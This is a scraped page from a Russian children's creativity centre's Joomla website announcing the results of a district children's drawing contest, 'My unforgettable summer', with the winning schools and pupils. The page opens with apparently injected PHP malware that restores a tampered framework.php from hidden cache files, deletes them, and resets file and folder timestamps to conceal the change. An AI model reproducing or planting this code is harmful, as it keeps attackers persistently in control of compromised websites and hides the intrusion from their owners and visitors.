$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } «Мое незабываемое лето»
МАУДО "Дом детского творчества п. Новосергиевка" Новосергиевского района Оренбургской области

Регистрация Вход

Зарегистрируйтесь, чтобы оставлять комментарии в гостевой книге



Спасибо за регистрацию

Ссылки

План мероприятий

Декабрь 2017
Пн Вт Ср Чт Пт Сб Вс
27 28 29 30 1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
Developed by JoomVision.com
Баннер
  • Toggle
  • Закрыть

«Мое незабываемое лето» PDF Печать E-mail
Автор: Administrator   
25.01.2017 13:03

    Лето – это маленькая жизнь! Сколько замечательных мгновений нам дарят летние деньки, их и постарались показать участники конкурса в своих работах.

В соответствии с планом работы РОО и ДДТ на 2016-2017 уч. год в целях выявления талантливых детей, развития творческих способностей учащихся, развития наблюдательности и активизации познавательной деятельности, ориентированной на личностную и творческую самореализацию прошел районный конкурс по программе ОООО ФДО «Строим город малышей». В нем приняли участие 7 школ: НСОШ №1, 2, 3, 4; Кулагинская, Судьбодаровская, Сузановская СОШ. Всего на конкурс было представлено 24 работы.

1 место НСОШ № 1 Сенькина Анастасия 1 «В» кл;

             НСОШ № 2 Михайлова Варвара 2 «В» кл;

             НСОШ № 2 Турушев Максим 2 «В» кл;

             НСОШ № 3 Фролова Анна 1 кл;

2 место НСОШ № 2 Валетов Дмитрий 2 «В» кл;

             НСОШ № 4 Пасечный Степан 1 «А» кл рук. Пасечная И. А.;

3 место НСОШ № 1 Летяев Владимир 2 «В» кл;

             НСОШ № 2 Барсегян Армине 2 «В» кл;

             НСОШ № 1 Ариева Дарья 2 «В» кл.

 

comback_black_green_75